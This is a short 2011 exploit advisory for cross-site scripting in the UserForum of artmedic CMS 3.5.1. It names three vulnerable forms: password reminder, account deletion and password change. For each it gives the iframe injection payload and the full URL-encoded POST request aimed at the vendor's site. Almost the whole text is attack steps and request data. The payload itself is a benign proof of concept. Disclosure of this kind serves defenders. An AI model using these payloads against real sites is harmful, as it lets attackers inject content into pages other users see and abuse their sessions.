# Exploit Title: Cross Site Scripting artmedic CMS 3.5.1 UserForum # Date: 18.08.2011 # Author: Sony # Software Link: http://www.artmedic-phpscripts.de/ # Version: artmedic CMS 3.5.1 #Proof of concept: http://st2tea.blogspot.com/2011/08/cross-site-scripting-artmedic-cms-351_18.html .................................................................. 1. http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=passwort Put in the E-Mailadresse our code : < iframe src="http://xssed.com" > and press button Passwort zusenden. #request# POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=sendpassword POST /index.php?page=forumindex&f=2&i=forum_index&fid=sendpassword forum_useremail=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Passwort+zusenden 2. http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=abmelden Put in the Benutzername and Benutzerpasswort our code : < iframe src=" http://xssed.com" > and press button.. #request# POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=abmeldenaction POST /index.php?page=forumindex&f=2&i=forum_index&fid=abmeldenaction forum_username=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&forum_userpasswort=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Benutzer+l%F6schen 3. http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=changepass Put in the Bisheriges Passwort,Neues Passwort and Benutzername our code : < iframe src="http://xssed.com" > and press button.. #request# POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=changepassaction POST /index.php?page=forumindex&f=2&i=forum_index&fid=changepassaction passold=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&passnew=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&forum_username=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Passwort+%E4ndern